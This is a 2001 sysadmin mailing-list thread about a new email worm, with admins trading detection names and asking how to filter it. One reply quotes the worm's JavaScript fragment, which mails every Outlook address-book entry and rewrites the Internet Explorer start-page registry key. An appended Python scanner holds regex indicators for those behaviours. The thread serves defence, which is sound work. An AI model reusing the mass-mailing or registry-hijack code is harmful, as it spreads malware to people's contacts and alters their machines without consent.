I would assume the following JS may be a good place to start:

if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page") == "http://pccontrol.tripod.com/";)
{return(0);}
ta=ol.GetNameSpace("MAPI").AddressLists.count;
for(a=1;a<=ta;++a){
        tb=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries.count;
        for(b=1;b<=tb;++b){
                try{
                Mail=ol.CreateItem(0);
        
Mail.to=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries(b);
                Mail.Subject="Hi !";
                Mail.Body="Hi, how are you ? I am fine here. Please read the
page http://pcControl.tripod.com/ to get some knowledge and prevent somebody
hack you. Forword this mail to help all your friends too.";
                Mail.Send;
                }
                catch(e){}
        }
}
}
function WriteRegMain()
{
if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page") != "http://pccontrol.tripod.com/";)
{WShl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page","http://pccontrol.tripod.com/";);}

Regards,
 
Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> 
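
Added example, not part of the original thread and not Mimesweeper rule syntax: a Python scanner that keys on the behaviours in the fragment above (Outlook address-book enumeration plus a send call, and a RegWrite to the IE Start Page key) rather than on the URL or subject, so re-spaced or re-worded copies still match. The indicator names, sample strings and the example.invalid URL are constructed for illustration.

```python
import re

# Behavioural indicators taken from the script fragment quoted in this thread.
# Patterns run against text that has been lower-cased with all whitespace
# removed, so mail line-wrapping and spacing changes do not break a match.
INDICATORS = {
    "mapi_addresslists": r'getnamespace\("mapi"\)\.addresslists',
    "address_entries":   r'\.addressentries',
    "create_mail_item":  r'\.createitem\(0\)',
    "send_call":         r'\.send[;(]',
    "regwrite":          r'\.regwrite\(',
    "ie_start_page_key": r'hkcu\\+software\\+microsoft\\+internetexplorer\\+main\\+startpage',
}

# A verdict fires only when every indicator in its set is present.
VERDICTS = {
    "address-book mass mailer": {"mapi_addresslists", "address_entries",
                                 "create_mail_item", "send_call"},
    "IE start page rewrite":    {"regwrite", "ie_start_page_key"},
}

def normalize(text):
    """Lower-case, unify quote characters and strip all whitespace."""
    return re.sub(r"\s+", "", text.lower().replace("'", '"'))

def scan(text):
    """Return (sorted verdict names, sorted indicator names) for a message body."""
    flat = normalize(text)
    hits = {name for name, rx in INDICATORS.items() if re.search(rx, flat)}
    verdicts = sorted(v for v, need in VERDICTS.items() if need <= hits)
    return verdicts, sorted(hits)

# Constructed samples (not captured traffic): indicator lines as quoted in the
# thread, a re-spaced single-quote variant, and a plain-text message.
QUOTED = r'''
tb=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries.count;
Mail=ol.CreateItem(0);
Mail.Send;
WShl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page","http://example.invalid/");
'''
VARIANT = ("n = o.getnamespace( 'MAPI' ).AddressLists( i ).AddressEntries.Count\n"
           "m = o.CreateItem( 0 )\nm.Send()")
PLAIN = "Hi, how are you ? Please read the page http://example.invalid/"

if __name__ == "__main__":
    for label, body in (("quoted", QUOTED), ("variant", VARIANT), ("plain", PLAIN)):
        print(label, scan(body))
```

Rules like these also match the script when it is merely quoted in discussion mail, which is the false positive Dean describes below.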


-----Original Message-----
From: Dean Cunningham [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:59 PM
To: NT System Admin Issues
Subject: RE: New Worm on the loose


William may well have triggered some of your AV products off with a reply to
this message.
It contained the JavaScript associated with the page.
****** Even though it was benign ******
William *did not* send you a virus.

The email made our McAfee detect it as a VBS/Generic@MM virus against a scan
engine of 4.1.40 and a dat of 4155 set for heuristic scanning. McAfee is
being a bit sensitive (and rightly so).

McAfee refers to it as VBS/Loding.a@MM (even though the 4155 dat refers to it
as VBS/Generic@MM)
http://vil.nai.com/vil/virusSummary.asp?virus_k=99185

Worse still, there is also JS/Offensive
http://vil.nai.com/vil/virusSummary.asp?virus_k=99189

Probably a mutation.

Can anyone tell me the key bit of JavaScript so I can use my content filter
(Mimesweeper) to block the mutations?

regards
Dean

-----Original Message-----
From: Stu Sjouwerman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 28 August 2001 10:50 a.m.
To: NT System Admin Issues
Subject: RE: New Worm on the loose


It sure is out there, I already got a bunch.

Stu



> -----Original Message-----
> From: Jay Woody [mailto:[EMAIL PROTECTED]]
> Sent: Monday, August 27, 2001 5:48 PM
> To: NT System Admin Issues
> Subject: Re: New Worm on the loose
> 
> 
> Is there a subject line?
> 
> JayW
> 
> >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>>
> Sorry about the cross posting.
> 
> We don't have a lot of specifics on it, but there appears to be a new worm
> on the loose. The payload is a typical Melissa-style worm, where its only
> action is to send mail to all members of the GAL, with the following
> message:
> "Hi, how are you ? I am fine here. Please read the page
> http://pcControl.tripod.com/ to get some knowledge and prevent somebody
> hack you. Forword this mail to help all your friends too."
> 
> It's plain text, and carries no executables with it, but I haven't visited
> the website yet. More info to follow, but there is zero information on the
> web about it at this point.
> 
> Roger
> ------------------------------------------------------
> Roger D. Seielstad - MCSE MCT
> Senior Systems Administrator
> Peregrine Systems
> Atlanta, GA
> http://www.peregrine.com 
> 
> 
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
> 